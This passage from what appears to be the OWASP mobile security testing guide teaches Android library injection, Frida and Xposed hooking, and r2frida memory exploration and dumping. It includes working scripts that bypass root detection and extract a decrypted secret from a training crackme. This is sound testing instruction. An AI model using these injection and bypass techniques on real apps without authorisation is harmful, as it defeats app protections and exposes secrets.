on macOS. On Android and iOS, a common example is using the Frida Gadget whenever Frida's so-called Injected mode of operation isn\u2019t suitable (i.e. you cannot run the Frida server on the target device). In this situation, you can inject the Gadget library by using the same methods you're going to learn in this section.
Library injection is desirable in many situations such as:
In this section, we will learn about techniques for performing library injection on Android, which basically consist of patching the application code (smali or native) or alternatively using the LD_PRELOAD
feature provided by the OS loader itself.
An Android application's decompiled smali code can be patched to introduce a call to System.loadLibrary
. The following smali patch injects a library named libinject.so:
const-string v0, \"inject\"\ninvoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V\n
Ideally you should insert the above code early in the application lifecycle, for instance in the onCreate
method. It is important to remember to add the library libinject.so in the respective architecture folder (armeabi-v7a, arm64-v8a, x86) of the lib
folder in the APK. Finally, you need to re-sign the application before using it.
A well-known use case of this technique is loading the Frida gadget to an application, especially while working on a non-rooted device (this is what objection patchapk
basically does).
Many Android applications use native code in addition to Java code for various performance and security reasons. The native code is present in the form of ELF shared libraries. An ELF executable includes a list of shared libraries (dependencies) that are linked to the executable for it to function optimally. This list can be modified to insert an additional library to be injected into the process.
Modifying the ELF file structure manually to inject a library can be cumbersome and prone to errors. However, this task can be performed with relative ease using LIEF (Library to Instrument Executable Formats). Using it requires only a few lines of Python code as shown below:
import lief\n\nlibnative = lief.parse(\"libnative.so\")\nlibnative.add_library(\"libinject.so\") # Injection!\nlibnative.write(\"libnative.so\")\n
In the above example, libinject.so library is injected as a dependency of a native library (libnative.so), which the application already loads by default. Frida gadget can be injected into an application using this approach as explained in detail in LIEF's documentation. As in the previous section, it is important to remember adding the library to the respective architecture lib
folder in the APK and finally re-signing the application.
Above we looked into techniques which require some kind of modification of the application's code. A library can also be injected into a process using functionalities offered by the loader of the operating system. On Android, which is a Linux based OS, you can load an additional library by setting the LD_PRELOAD
environment variable.
As the ld.so man page states, symbols loaded from the library passed using LD_PRELOAD
always get precedence, i.e. they are searched first by the loader while resolving the symbols, effectively overriding the original ones. This feature is often used to inspect the input parameters of some commonly used libc functions such as fopen
, read
, write
, strcmp
, etc., specially in obfuscated programs, where understanding their behavior may be challenging. Therefore, having an insight on which files are being opened or which strings are being compared may be very valuable. The key idea here is \"function wrapping\", meaning that you cannot patch system calls such as libc's fopen
, but you can override (wrap) it including custom code that will, for instance, print the input parameters for you and still call the original fopen
remaining transparent to the caller.
On Android, setting LD_PRELOAD
is slightly different compared to other Linux distributions. If you recall from the \"Platform Overview\" section, every application in Android is forked from Zygote, which is started very early during the Android boot-up. Thus, setting LD_PRELOAD
on Zygote is not possible. As a workaround for this problem, Android supports the setprop
(set property) functionality. Below you can see an example for an application with package name com.foo.bar
(note the additional wrap.
prefix):
setprop wrap.com.foo.bar LD_PRELOAD=/data/local/tmp/libpreload.so\n
Please note that if the library to be preloaded does not have SELinux context assigned, from Android 5.0 (API level 21) onwards, you need to disable SELinux to make LD_PRELOAD
work, which may require root.
You can use the command Java
in the Frida CLI to access the Java runtime and retrieve information from the running app. Remember that, unlike Frida for iOS, in Android you need to wrap your code inside a Java.perform
function. Thus, it's more convenient to use Frida scripts to e.g. get a list of loaded Java classes and their corresponding methods and fields or for more complex information gathering or instrumentation. One such scripts is listed below. The script to list class's methods used below is available on Github.
// Get list of loaded Java classes and methods\n\n// Filename: java_class_listing.js\n\nJava.perform(function() {\n Java.enumerateLoadedClasses({\n onMatch: function(className) {\n console.log(className);\n describeJavaClass(className);\n },\n onComplete: function() {}\n });\n});\n\n// Get the methods and fields\nfunction describeJavaClass(className) {\n var jClass = Java.use(className);\n console.log(JSON.stringify({\n _name: className,\n _methods: Object.getOwnPropertyNames(jClass.__proto__).filter(function(m) {\n return !m.startsWith('$') // filter out Frida related special properties\n || m == 'class' || m == 'constructor' // optional\n }),\n _fields: jClass.class.getFields().map(function(f) {\n return( f.toString());\n })\n }, null, 2));\n}\n
After saving the script to a file called java_class_listing.js, you can tell Frida CLI to load it by using the flag -l
and inject it to the process ID specified by -p
.
frida -U -l java_class_listing.js -p <pid>\n\n// Output\n[Huawei Nexus 6P::sg.vantagepoint.helloworldjni]->\n...\n\ncom.scottyab.rootbeer.sample.MainActivity\n{\n \"_name\": \"com.scottyab.rootbeer.sample.MainActivity\",\n \"_methods\": [\n ...\n \"beerView\",\n \"checkRootImageViewList\",\n \"floatingActionButton\",\n \"infoDialog\",\n \"isRootedText\",\n \"isRootedTextDisclaimer\",\n \"mActivity\",\n \"GITHUB_LINK\"\n ],\n \"_fields\": [\n \"public static final int android.app.Activity.DEFAULT_KEYS_DIALER\",\n...\n
Given the verbosity of the output, the system classes can be filtered out programmatically to make output more readable and relevant to the use case.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0043/","title":"Method Hooking","text":""},{"location":"MASTG/techniques/android/MASTG-TECH-0043/#xposed","title":"Xposed","text":"Let's assume you're testing an app that's stubbornly quitting on your rooted device. You decompile the app and find the following highly suspect method:
package com.example.a.b\n\npublic static boolean c() {\n int v3 = 0;\n boolean v0 = false;\n\n String[] v1 = new String[]{\"/sbin/\", \"/system/bin/\", \"/system/xbin/\", \"/data/local/xbin/\",\n \"/data/local/bin/\", \"/system/sd/xbin/\", \"/system/bin/failsafe/\", \"/data/local/\"};\n\n int v2 = v1.length;\n\n for(int v3 = 0; v3 < v2; v3++) {\n if(new File(String.valueOf(v1[v3]) + \"su\").exists()) {\n v0 = true;\n return v0;\n }\n }\n\n return v0;\n}\n
This method iterates through a list of directories and returns true
(device rooted) if it finds the su
binary in any of them. Checks like this are easy to deactivate all you have to do is replace the code with something that returns \"false\". Method hooking with an Xposed module is one way to do this (see \"Android Basic Security Testing\" for more details on Xposed installation and basics).
The method XposedHelpers.findAndHookMethod
allows you to override existing class methods. By inspecting the decompiled source code, you can find out that the method performing the check is c
. This method is located in the class com.example.a.b
. The following is an Xposed module that overrides the function so that it always returns false:
package com.awesome.pentestcompany;\n\nimport static de.robv.android.xposed.XposedHelpers.findAndHookMethod;\nimport de.robv.android.xposed.IXposedHookLoadPackage;\nimport de.robv.android.xposed.XposedBridge;\nimport de.robv.android.xposed.XC_MethodHook;\nimport de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam;\n\npublic class DisableRootCheck implements IXposedHookLoadPackage {\n\n public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable {\n if (!lpparam.packageName.equals(\"com.example.targetapp\"))\n return;\n\n findAndHookMethod(\"com.example.a.b\", lpparam.classLoader, \"c\", new XC_MethodHook() {\n @Override\n\n protected void beforeHookedMethod(MethodHookParam param) throws Throwable {\n XposedBridge.log(\"Caught root check!\");\n param.setResult(false);\n }\n\n });\n }\n}\n
Just like regular Android apps, modules for Xposed are developed and deployed with Android Studio. For more details on writing, compiling, and installing Xposed modules, refer to the tutorial provided by its author, rovo89.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0043/#frida","title":"Frida","text":"We'll use Frida to solve the UnCrackable App for Android Level 1 and demonstrate how we can easily bypass root detection and extract secret data from the app.
When you start the crackme app on an emulator or a rooted device, you'll find that the it presents a dialog box and exits as soon as you press \"OK\" because it detected root:
Let's see how we can prevent this.
The main method (decompiled with CFR) looks like this:
package sg.vantagepoint.uncrackable1;\n\nimport android.app.Activity;\nimport android.app.AlertDialog;\nimport android.content.Context;\nimport android.content.DialogInterface;\nimport android.os.Bundle;\nimport android.text.Editable;\nimport android.view.View;\nimport android.widget.EditText;\nimport sg.vantagepoint.a.b;\nimport sg.vantagepoint.a.c;\nimport sg.vantagepoint.uncrackable1.a;\n\npublic class MainActivity\nextends Activity {\n private void a(String string) {\n AlertDialog alertDialog = new AlertDialog.Builder((Context)this).create();\n alertDialog.setTitle((CharSequence)string);\n alertDialog.setMessage((CharSequence)\"This is unacceptable. The app is now going to exit.\");\n alertDialog.setButton(-3, (CharSequence)\"OK\", new DialogInterface.OnClickListener(){\n\n public void onClick(DialogInterface dialogInterface, int n) {\n System.exit((int)0);\n }\n });\n alertDialog.setCancelable(false);\n alertDialog.show();\n }\n\n protected void onCreate(Bundle bundle) {\n if (c.a() || c.b() || c.c()) {\n this.a(\"Root detected!\");\n }\n if (b.a(this.getApplicationContext())) {\n this.a(\"App is debuggable!\");\n }\n super.onCreate(bundle);\n this.setContentView(2130903040);\n }\n\n /*\n * Enabled aggressive block sorting\n */\n public void verify(View object) {\n object = ((EditText)this.findViewById(2130837505)).getText().toString();\n AlertDialog alertDialog = new AlertDialog.Builder((Context)this).create();\n if (a.a((String)object)) {\n alertDialog.setTitle((CharSequence)\"Success!\");\n object = \"This is the correct secret.\";\n } else {\n alertDialog.setTitle((CharSequence)\"Nope...\");\n object = \"That's not it. Try again.\";\n }\n alertDialog.setMessage((CharSequence)object);\n alertDialog.setButton(-3, (CharSequence)\"OK\", new DialogInterface.OnClickListener(){\n\n public void onClick(DialogInterface dialogInterface, int n) {\n dialogInterface.dismiss();\n }\n });\n alertDialog.show();\n }\n}\n
Notice the \"Root detected\" message in the onCreate
method and the various methods called in the preceding if
-statement (which perform the actual root checks). Also note the \"This is unacceptable...\" message from the first method of the class, private void a
. Obviously, this method displays the dialog box. There is an alertDialog.onClickListener
callback set in the setButton
method call, which closes the application via System.exit
after successful root detection. With Frida, you can prevent the app from exiting by hooking the MainActivity.a
method or the callback inside it. The example below shows how you can hook MainActivity.a
and prevent it from ending the application.
setImmediate(function() { //prevent timeout\n console.log(\"[*] Starting script\");\n\n Java.perform(function() {\n var mainActivity = Java.use(\"sg.vantagepoint.uncrackable1.MainActivity\");\n mainActivity.a.implementation = function(v) {\n console.log(\"[*] MainActivity.a called\");\n };\n console.log(\"[*] MainActivity.a modified\");\n\n });\n});\n
Wrap your code in the function setImmediate
to prevent timeouts (you may or may not need to do this), then call Java.perform
to use Frida's methods for dealing with Java. Afterwards retrieve a wrapper for MainActivity
class and overwrite its a
method. Unlike the original, the new version of a
just writes console output and doesn't exit the app. An alternative solution is to hook onClick
method of the OnClickListener
interface. You can overwrite the onClick
method and prevent it from ending the application with the System.exit
call. If you want to inject your own Frida script, it should either disable the AlertDialog
entirely or change the behavior of the onClick
method so the app does not exit when you click \"OK\".
Save the above script as uncrackable1.js
and load it:
frida -U -f owasp.mstg.uncrackable1 -l uncrackable1.js --no-pause\n
After you see the \"MainActivity.a modified\" message and the app will not exit anymore.
You can now try to input a \"secret string\". But where do you get it?
If you look at the class sg.vantagepoint.uncrackable1.a
, you can see the encrypted string with which your input gets compared:
package sg.vantagepoint.uncrackable1;\n\nimport android.util.Base64;\nimport android.util.Log;\n\npublic class a {\n public static boolean a(String string) {\n\n byte[] arrby = Base64.decode((String)\"5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=\", (int)0);\n\n try {\n arrby = sg.vantagepoint.a.a.a(a.b(\"8d127684cbc37c17616d806cf50473cc\"), arrby);\n }\n catch (Exception exception) {\n StringBuilder stringBuilder = new StringBuilder();\n stringBuilder.append(\"AES error:\");\n stringBuilder.append(exception.getMessage());\n Log.d((String)\"CodeCheck\", (String)stringBuilder.toString());\n arrby = new byte[]{};\n }\n return string.equals((Object)new String(arrby));\n }\n\n public static byte[] b(String string) {\n int n = string.length();\n byte[] arrby = new byte[n / 2];\n for (int i = 0; i < n; i += 2) {\n arrby[i / 2] = (byte)((Character.digit((char)string.charAt(i), (int)16) << 4) + Character.digit((char)string.charAt(i + 1), (int)16));\n }\n return arrby;\n }\n}\n
Look at the string.equals
comparison at the end of the a
method and the creation of the string arrby
in the try
block above. arrby
is the return value of the function sg.vantagepoint.a.a.a
. string.equals
comparison compares your input with arrby
. So we want the return value of sg.vantagepoint.a.a.a.
Instead of reversing the decryption routines to reconstruct the secret key, you can simply ignore all the decryption logic in the app and hook the sg.vantagepoint.a.a.a
function to catch its return value. Here is the complete script that prevents exiting on root and intercepts the decryption of the secret string:
setImmediate(function() { //prevent timeout\n console.log(\"[*] Starting script\");\n\n Java.perform(function() {\n var mainActivity = Java.use(\"sg.vantagepoint.uncrackable1.MainActivity\");\n mainActivity.a.implementation = function(v) {\n console.log(\"[*] MainActivity.a called\");\n };\n console.log(\"[*] MainActivity.a modified\");\n\n var aaClass = Java.use(\"sg.vantagepoint.a.a\");\n aaClass.a.implementation = function(arg1, arg2) {\n var retval = this.a(arg1, arg2);\n var password = '';\n for(var i = 0; i < retval.length; i++) {\n password += String.fromCharCode(retval[i]);\n }\n\n console.log(\"[*] Decrypted: \" + password);\n return retval;\n };\n console.log(\"[*] sg.vantagepoint.a.a.a modified\");\n });\n});\n
After running the script in Frida and seeing the \"[*] sg.vantagepoint.a.a.a modified\" message in the console, enter a random value for \"secret string\" and press verify. You should get an output similar to the following:
$ frida -U -f owasp.mstg.uncrackable1 -l uncrackable1.js --no-pause\n\n[*] Starting script\n[USB::Android Emulator 5554::sg.vantagepoint.uncrackable1]-> [*] MainActivity.a modified\n[*] sg.vantagepoint.a.a.a modified\n[*] MainActivity.a called.\n[*] Decrypted: I want to believe\n
The hooked function outputted the decrypted string. You extracted the secret string without having to dive too deep into the application code and its decryption routines.
You've now covered the basics of static/dynamic analysis on Android. Of course, the only way to really learn it is hands-on experience: build your own projects in Android Studio, observe how your code gets translated into bytecode and native code, and try to crack our challenges.
In the remaining sections, we'll introduce a few advanced subjects, including process exploration, kernel modules and dynamic execution.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0044/","title":"Process Exploration","text":"When testing an app, process exploration can provide the tester with deep insights into the app process memory. It can be achieved via runtime instrumentation and allows to perform tasks such as:
As you can see, these passive tasks help us collect information. This Information is often used for other techniques, such as method hooking.
In the following sections you will be using r2frida to retrieve information straight from the app runtime. Please refer to r2frida's official installation instructions. First start by opening an r2frida session to the target app (e.g. HelloWorld JNI APK) that should be running on your Android phone (connected per USB). Use the following command:
r2 frida://usb//sg.vantagepoint.helloworldjni\n
See all options with r2 frida://?
.
Once in the r2frida session, all commands start with :
. For example, in radare2 you'd run i
to display the binary information, but in r2frida you'd use :i
.
You can retrieve the app's memory maps by running \\dm
. The output in Android can get very long (e.g. between 1500 and 2000 lines), to narrow your search and see only what directly belongs to the app apply a grep (~
) by package name \\dm~<package_name>
:
[0x00000000]> \\dm~sg.vantagepoint.helloworldjni\n0x000000009b2dc000 - 0x000000009b361000 rw- /dev/ashmem/dalvik-/data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art (deleted)\n0x000000009b361000 - 0x000000009b36e000 --- /dev/ashmem/dalvik-/data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art (deleted)\n0x000000009b36e000 - 0x000000009b371000 rw- /dev/ashmem/dalvik-/data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art (deleted)\n0x0000007d103be000 - 0x0000007d10686000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.vdex\n0x0000007d10dd0000 - 0x0000007d10dee000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d10dee000 - 0x0000007d10e2b000 r-x /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d10e3a000 - 0x0000007d10e3b000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d10e3b000 - 0x0000007d10e3c000 rw- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d1c499000 - 0x0000007d1c49a000 r-x /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c4a9000 - 0x0000007d1c4aa000 r-- /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c4aa000 - 0x0000007d1c4ab000 rw- /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c516000 - 0x0000007d1c54d000 r-- /data/app/sg.vantagepoint.helloworldjni-1/base.apk\n0x0000007dbd23c000 - 0x0000007dbd247000 r-- /data/app/sg.vantagepoint.helloworldjni-1/base.apk\n0x0000007dc05db000 - 0x0000007dc05dc000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art\n
While you're searching or exploring the app memory, you can always verify where you're located at each moment (where your current offset is located) in the memory map. Instead of noting and searching for the memory address in this list you can simply run \\dm.
. You'll find an example in the following section \"In-Memory Search\".
If you're only interested in the modules (binaries and libraries) that the app has loaded, you can use the command \\il
to list them all:
[0x00000000]> \\il\n0x000000558b1fd000 app_process64\n0x0000007dbc859000 libandroid_runtime.so\n0x0000007dbf5d7000 libbinder.so\n0x0000007dbff4d000 libcutils.so\n0x0000007dbfd13000 libhwbinder.so\n0x0000007dbea00000 liblog.so\n0x0000007dbcf17000 libnativeloader.so\n0x0000007dbf21c000 libutils.so\n0x0000007dbde4b000 libc++.so\n0x0000007dbe09b000 libc.so\n...\n0x0000007d10dd0000 base.odex\n0x0000007d1c499000 libnative-lib.so\n0x0000007d2354e000 frida-agent-64.so\n0x0000007dc065d000 linux-vdso.so.1\n0x0000007dc065f000 linker64\n
As you might expect you can correlate the addresses of the libraries with the memory maps: e.g. the native library of the app is located at 0x0000007d1c499000
and optimized dex (base.odex) at 0x0000007d10dd0000
.
You can also use objection to display the same information.
$ objection --gadget sg.vantagepoint.helloworldjni explore\n\nsg.vantagepoint.helloworldjni on (google: 8.1.0) [usb] # memory list modules\nSave the output by adding `--json modules.json` to this command\n\nName Base Size Path\n----------------------------------------------- ------------ -------------------- --------------------------------------------------------------------\napp_process64 0x558b1fd000 32768 (32.0 KiB) /system/bin/app_process64\nlibandroid_runtime.so 0x7dbc859000 1982464 (1.9 MiB) /system/lib64/libandroid_runtime.so\nlibbinder.so 0x7dbf5d7000 557056 (544.0 KiB) /system/lib64/libbinder.so\nlibcutils.so 0x7dbff4d000 77824 (76.0 KiB) /system/lib64/libcutils.so\nlibhwbinder.so 0x7dbfd13000 163840 (160.0 KiB) /system/lib64/libhwbinder.so\nbase.odex 0x7d10dd0000 442368 (432.0 KiB) /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\nlibnative-lib.so 0x7d1c499000 73728 (72.0 KiB) /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n
You can even directly see the size and the path to that binary in the Android file system.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0044/#in-memory-search","title":"In-Memory Search","text":"In-memory search is a very useful technique to test for sensitive data that might be present in the app memory.
See r2frida's help on the search command (\\/?
) to learn about the search command and get a list of options. The following shows only a subset of them:
[0x00000000]> \\/?\n / search\n /j search json\n /w search wide\n /wj search wide json\n /x search hex\n /xj search hex json\n...\n
You can adjust your search by using the search settings \\e~search
. For example, \\e search.quiet=true;
will print only the results and hide search progress:
[0x00000000]> \\e~search\ne search.in=perm:r--\ne search.quiet=false\n
For now, we'll continue with the defaults and concentrate on string search. This app is actually very simple, it loads the string \"Hello from C++\" from its native library and displays it to us. You can start by searching for \"Hello\" and see what r2frida finds:
[0x00000000]> \\/ Hello\nSearching 5 bytes: 48 65 6c 6c 6f\n...\nhits: 11\n0x13125398 hit0_0 HelloWorldJNI\n0x13126b90 hit0_1 Hello World!\n0x1312e220 hit0_2 Hello from C++\n0x70654ec5 hit0_3 Hello\n0x7d1c499560 hit0_4 Hello from C++\n0x7d1c4a9560 hit0_5 Hello from C++\n0x7d1c51cef9 hit0_6 HelloWorldJNI\n0x7d30ba11bc hit0_7 Hello World!\n0x7d39cd796b hit0_8 Hello.java\n0x7d39d2024d hit0_9 Hello;\n0x7d3aa4d274 hit0_10 Hello\n
Now you'd like to know where these addresses actually are. You may do so by running the \\dm.
command for all @@
hits matching the glob hit0_*
:
[0x00000000]> \\dm.@@ hit0_*\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x00000000703c2000 - 0x00000000709b5000 rw- /data/dalvik-cache/arm64/system@framework@boot-framework.art\n0x0000007d1c499000 - 0x0000007d1c49a000 r-x /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c4a9000 - 0x0000007d1c4aa000 r-- /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c516000 - 0x0000007d1c54d000 r-- /data/app/sg.vantagepoint.helloworldjni-1/base.apk\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d396bc000 - 0x0000007d3a998000 r-- /system/framework/arm64/boot-framework.vdex\n0x0000007d396bc000 - 0x0000007d3a998000 r-- /system/framework/arm64/boot-framework.vdex\n0x0000007d3a998000 - 0x0000007d3aa9c000 r-- /system/framework/arm64/boot-ext.vdex\n
Additionally, you can search for occurrences of the wide version of the string (\\/w
) and, again, check their memory regions:
[0x00000000]> \\/w Hello\nSearching 10 bytes: 48 00 65 00 6c 00 6c 00 6f 00\nhits: 6\n0x13102acc hit1_0 480065006c006c006f00\n0x13102b9c hit1_1 480065006c006c006f00\n0x7d30a53aa0 hit1_2 480065006c006c006f00\n0x7d30a872b0 hit1_3 480065006c006c006f00\n0x7d30bb9568 hit1_4 480065006c006c006f00\n0x7d30bb9a68 hit1_5 480065006c006c006f00\n\n[0x00000000]> \\dm.@@ hit1_*\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n
They are in the same rw- region as one of the previous strings (0x0000007d30a00000
). Note that searching for the wide versions of strings is sometimes the only way to find them as you'll see in the following section.
In-memory search can be very useful to quickly know if certain data is located in the main app binary, inside a shared library or in another region. You may also use it to test the behavior of the app regarding how the data is kept in memory. For instance, you could analyze an app that performs a login and search for occurrences of the user password. Also, you may check if you still can find the password in memory after the login is completed to verify if this sensitive data is wiped from memory after its use.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0044/#memory-dump","title":"Memory Dump","text":"You can dump the app's process memory with objection and Fridump. To take advantage of these tools on a non-rooted device, the Android app must be repackaged with frida-gadget.so
and re-signed. A detailed explanation of this process is in the section Dynamic Analysis on Non-Rooted Devices. To use these tools on a rooted phone, simply have frida-server installed and running.
Note: When using these tools, you might get several memory access violation errors which can normally be ignored. These tools inject a Frida agent and try to dump all the mapped memory of the app regardless of the access permissions (read/write/execute). Therefore, when the injected Frida agent tries to read a region that's not readable, it'll return the corresponding memory access violation errors. Refer to previous section \"Memory Maps and Inspection\" for more details.
With objection it is possible to dump all memory of the running process on the device by using the command memory dump all
.
$ objection --gadget sg.vantagepoint.helloworldjni explore\n\nsg.vantagepoint.helloworldjni on (google: 8.1.0) [usb] # memory dump all /Users/foo/memory_Android/memory\n\nWill dump 719 rw- images, totalling 1.6 GiB\nDumping 1002.8 MiB from base: 0x14140000 [------------------------------------] 0% 00:11:03(session detach message) process-terminated\nDumping 8.0 MiB from base: 0x7fc753e000 [####################################] 100%\nMemory dumped to file: /Users/foo/memory_Android/memory\n
In this case there was an error, which is probably due to memory access violations as we already anticipated. This error can be safely ignored as long as we are able to see the extracted dump in the file system. If you have any problems, a first step would be to enable the debug flag -d
when running objection or, if that doesn't help, file an issue in objection's GitHub.
Next, we are able to find the \"Hello from C++\" strings with radare2:
$ r2 /Users/foo/memory_Android/memory\n[0x00000000]> izz~Hello from\n1136 0x00065270 0x00065270 14 15 () ascii Hello from C++\n
Alternatively you can use Fridump. This time, we will input a string and see if we can find it in the memory dump. For this, open the MASTG Hacking Playground app, navigate to \"OMTG_DATAST_002_LOGGING\" and enter \"owasp-mstg\" to the password field. Next, run Fridump:
python3 fridump.py -U sg.vp.owasp_mobile.omtg_android -s\n\nCurrent Directory: /Users/foo/git/fridump\nOutput directory is set to: /Users/foo/git/fridump/dump\nStarting Memory dump...\nOops, memory access violation!-------------------------------] 0.28% Complete\nProgress: [##################################################] 99.58% Complete\nRunning strings on all files:\nProgress: [##################################################] 100.0% Complete\n\nFinished!\n
Tip: Enable verbosity by including the flag -v
if you want to see more details, e.g. the regions provoking memory access violations.
It will take a while until it's completed and you'll get a collection of *.data files inside the dump folder. When you add the -s
flag, all strings are extracted from the dumped raw memory files and added to the file strings.txt
, which is also stored in the dump directory.
ls dump/\ndump/1007943680_dump.data dump/357826560_dump.data dump/630456320_dump.data ... strings.txt\n
Finally, search for the input string in the dump directory:
$ grep -nri owasp-mstg dump/\nBinary file dump//316669952_dump.data matches\nBinary file dump//strings.txt matches\n
The \"owasp-mstg\" string can be found in one of the dump files as well as in the processed strings file.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0045/","title":"Runtime Reverse Engineering","text":"Runtime reverse engineering can be seen as the on-the-fly version of reverse engineering where you don't have the binary data to your host computer. Instead, you'll analyze it straight from the memory of the app.
We'll keep using the HelloWorld JNI app, open a session with r2frida r2 frida://usb//sg.vantagepoint.helloworldjni
and you can start by displaying the target binary information by using the :i
command:
[0x00000000]> :i\narch arm\nbits 64\nos linux\npid 13215\nuid 10096\nobjc false\nruntime V8\njava true\ncylang false\npageSize 4096\npointerSize 8\ncodeSigningPolicy optional\nisDebuggerAttached false\ncwd /\ndataDir /data/user/0/sg.vantagepoint.helloworldjni\ncodeCacheDir /data/user/0/sg.vantagepoint.helloworldjni/code_cache\nextCacheDir /storage/emulated/0/Android/data/sg.vantagepoint.helloworldjni/cache\nobbDir /storage/emulated/0/Android/obb/sg.vantagepoint.helloworldjni\nfilesDir /data/user/0/sg.vantagepoint.helloworldjni/files\nnoBackupDir /data/user/0/sg.vantagepoint.helloworldjni/no_backup\ncodePath /data/app/sg.vantagepoint.helloworldjni-1/base.apk\npackageName sg.vantagepoint.helloworldjni\nandroidId c92f43af46f5578d\ncacheDir /data/local/tmp\njniEnv 0x7d30a43c60\n
Search all symbols of a certain module with :is <lib>
, e.g. :is libnative-lib.so
.
[0x00000000]> \\is libnative-lib.so\n\n[0x00000000]>\n
Which are empty in this case. Alternatively, you might prefer to look into the imports/exports. For example, list the imports with :ii <lib>
:
[0x00000000]> :ii libnative-lib.so\n0x7dbe1159d0 f __cxa_finalize /system/lib64/libc.so\n0x7dbe115868 f __cxa_atexit /system/lib64/libc.so\n
And list the exports with :iE <lib>
:
[0x00000000]> :iE libnative-lib.so\n0x7d1c49954c f Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI\n
For big binaries it's recommended to pipe the output to the internal less program by appending ~..
, i.e. \\ii libandroid_runtime.so~..
(if not, for this binary, you'd get almost 2500 lines printed to your terminal).
The next thing you might want to look at are the currently loaded Java classes:
[0x00000000]> \\ic~sg.vantagepoint.helloworldjni\nsg.vantagepoint.helloworldjni.MainActivity\n
List class fields:
[0x00000000]> :ic sg.vantagepoint.helloworldjni.MainActivity~sg.vantagepoint.helloworldjni\npublic native java.lang.String sg.vantagepoint.helloworldjni.MainActivity.stringFromJNI()\npublic sg.vantagepoint.helloworldjni.MainActivity()\n
Note that we've filtered by package name as this is the MainActivity
and it includes all methods from Android's Activity
class.
You can also display information about the class loader:
[0x00000000]> :icL\ndalvik.system.PathClassLoader[\n DexPathList[\n [\n directory \".\"]\n ,\n nativeLibraryDirectories=[\n /system/lib64,\n /vendor/lib64,\n /system/lib64,\n /vendor/lib64]\n ]\n ]\njava.lang.BootClassLoader@b1f1189dalvik.system.PathClassLoader[\n DexPathList[\n [\n zip file \"/data/app/sg.vantagepoint.helloworldjni-1/base.apk\"]\n ,\n nativeLibraryDirectories=[\n /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64,\n /data/app/sg.vantagepoint.helloworldjni-1/base.apk!/lib/arm64-v8a,\n /system/lib64,\n /vendor/lib64]\n ]\n ]\n
Next, imagine that you are interested into the method exported by libnative-lib.so 0x7d1c49954c f Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
. You can seek to that address with s 0x7d1c49954c
, analyze that function af
and print 10 lines of its disassembly pd 10
:
[0x7d1c49954c]> pdf\n ;-- sym.fun.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI:\n\u256d (fcn) fcn.7d1c49954c 18\n\u2502 fcn.7d1c49954c (int32_t arg_40f942h);\n\u2502 ; arg int32_t arg_40f942h @ x29+0x40f942\n\u2502 0x7d1c49954c 080040f9 ldr x8, [x0]\n\u2502 0x7d1c499550 01000090 adrp x1, 0x7d1c499000\n\u2502 0x7d1c499554 21801591 add x1, x1, 0x560 ; hit0_4\n\u2502 0x7d1c499558 029d42f9 ldr x2, [x8, 0x538] ; [0x538:4]=-1 ; 1336\n\u2502 0x7d1c49955c 4000 invalid\n
Note that the line tagged with ; hit0_4
corresponds to the string that we've previously found: 0x7d1c499560 hit0_4 Hello from C++
.
To learn more, please refer to the r2frida wiki.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0100/","title":"Logging Sensitive Data from Network Traffic","text":"mitmproxy can be used to intercept network traffic from Android apps. This technique is useful for identifying sensitive data that is sent over the network, as well as for identifying potential security vulnerabilities.
Once with mitmproxy installed and your device configured to use it, you can create a python script to filter the traffic and extract the sensitive data. For example, the following script will extract all the data sent in the requests and responses only if the data is considered sensitive. For this example we consider sensitive data to be any data that contains the strings \"dummyPassword\" or \"sampleUser\", so we include them in the SENSITIVE_STRINGS
list.
